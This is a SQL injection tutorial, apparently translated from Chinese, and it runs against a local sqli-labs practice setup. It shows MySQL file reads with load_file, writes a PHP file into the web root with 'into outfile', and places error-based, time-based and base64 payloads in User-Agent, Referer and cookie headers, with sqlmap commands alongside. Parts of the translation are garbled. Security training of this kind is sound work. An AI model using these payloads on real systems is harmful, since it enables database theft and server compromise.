Web security offensive and defensive learning --07- (MySQL injection read and write files, HTTP headers SQL injection, HTTP User-Agent injection, HTTP Referer injection, cookie injection) (emphasis)

1, MySQL injection read and write files

MySQL database during the infiltration process can be used, or more functions, in addition to reading data, the file can be read (if sufficient permissions)

Read premise:

• 1. The user right is sufficiently high, as much as possible with root privileges
• 2.secure_file_priv not null

Need to artificially set a default value of secure_file_priv

Modify the database configuration file:

After saving the file restart Phpstudy2018, revalidation:

Read the contents of the file

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,load_file(‘D:\1.txt’),3 --+

http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,load_file(‘C:\Users\Administrator\Desktop\sqlmap\sqlmapproject-sqlmap-3b7dd2c\target.txt’),3 --+

MySQL open file write

show variables like '% general%' ; # default is off
set global general_log = on;

Sql begin to write the file:

http://127.0.0.1/sqli/Less-7/?id=-1’)) union select 1,’<?php phpinfo(); ?>’,3 into outfile ‘C:\\Users\\Administrator\\Desktop\\sqlmap\\sqlmapproject-sqlmap-3b7dd2c\\target.txt’ --+

Note that the file path must double slash interval , into outfile is the result of the previous sql query is written back to the path folder.

http://127.0.0.1/sqli/Less-7/?id=-1’)) union select 1,"<?php phpinfo(); ?>",3 into outfile “G:\\phpstudy2018\\PHPTutorial\\WWW\\sqli\\Less-7\\1.php” --+

Sqlmap use to read and write files

python sqlmap.py -u “http://127.0.0.1/sqli/Less-7/?id=1” --file-read “D:\\1.txt”

2, HTTP header SQL injection

Introduction HTTP header injection
in the case of security awareness more and more attention, a lot of sites are preventing vulnerabilities. Such as SQL injection, the parameters are submitted by users that certain measures are filtered code.
Filter out the parameters directly from the user, but the content submitted in the HTTP header is likely there will be no filtering.

updatexml function
UPDATEXML (XML_document, XPath_string, new_value) ;
first parameter: XML_document String format is, as the name of the XML document object, Doc herein as
the second argument: XPath_string (Xpath string format)
the third parameter: new_value , String format, replace the found qualified data

• HTTP User-Agent注入

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1
0x7e是转义字符~

Output version information


output database name

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1' = '1
0x7e是转义字符~

Kali another virtual machine testing methods and tools:

or '. 1' = 'Case closed. 1 as follows :

# ' or '1'='1        报错信息
正常sql语句如下
select * from users where id = '1';

推导出闭合语句为：
select * from users where id = '1‘ or ’1‘=’1 ';      闭合成功

• HTTP Referer injection

' or if(1=1,sleep(5),null)  or '1'='1

sqlmap safety testing
sqlmap automatically search form POST injection
sqlmap specified parameters to detect SQL injection
sqlmap referer injected into the referer followed by the * or *

2, cookie injection

HTTP header injection described
server may use cookies to contain any of the information screen and regular maintenance information to determine the state of the HTTP transport. cookies most classic application is to determine whether the user has logged site.

cookie injection
using Cookie parameter code transmitted, but not the Cookie parameter passed the filtering operation. Lead to SQL injection vulnerabilities.

Injected payload

Cookie: uname=admin’ or 1=1 --+
Cookie: uname=admin’ and updatexml(1,concat(0x7e,version(),0x7e),1) --+

sqlmap safety test

sqlmap -r target.txt --level 3 --batch

Cookie injection Base64
Base64 describes
base64 binary encoding to the character from the process, it can be used for transmitting longer identification information in an HTTP environment. base64 is one of the most common network for the transmission of 8Bit encoding bytecode, base64 is based on 64 printable characters to binary data representation.

The original content is converted to binary, from left to right to take six, and then fill in the two highest 0, to form a new content (can be converted back)

encoding rules

• 1. 3 characters 4 characters into
• 2. Every 76 characters plus a newline
• 3. Finally, we need to address terminator

cookie Base64 inject code analysis
base64 encryption URL

If the reported Warning: date (): Set date.timezone in php.ini is a PRC, later set to: date.timezone = PRC
using Base64 encryption injection statement is inserted into the position corresponding to complete the SQL injection Cookie detecting vulnerabilities.

After modifying the saved restart


plaintext "or. 1. 1 = # (encrypted below)

IiBvciAxPTEgIw ==

sqlmap safety testing

python sqlmap.py -r target.txt --level 3 --tamper base64encode.py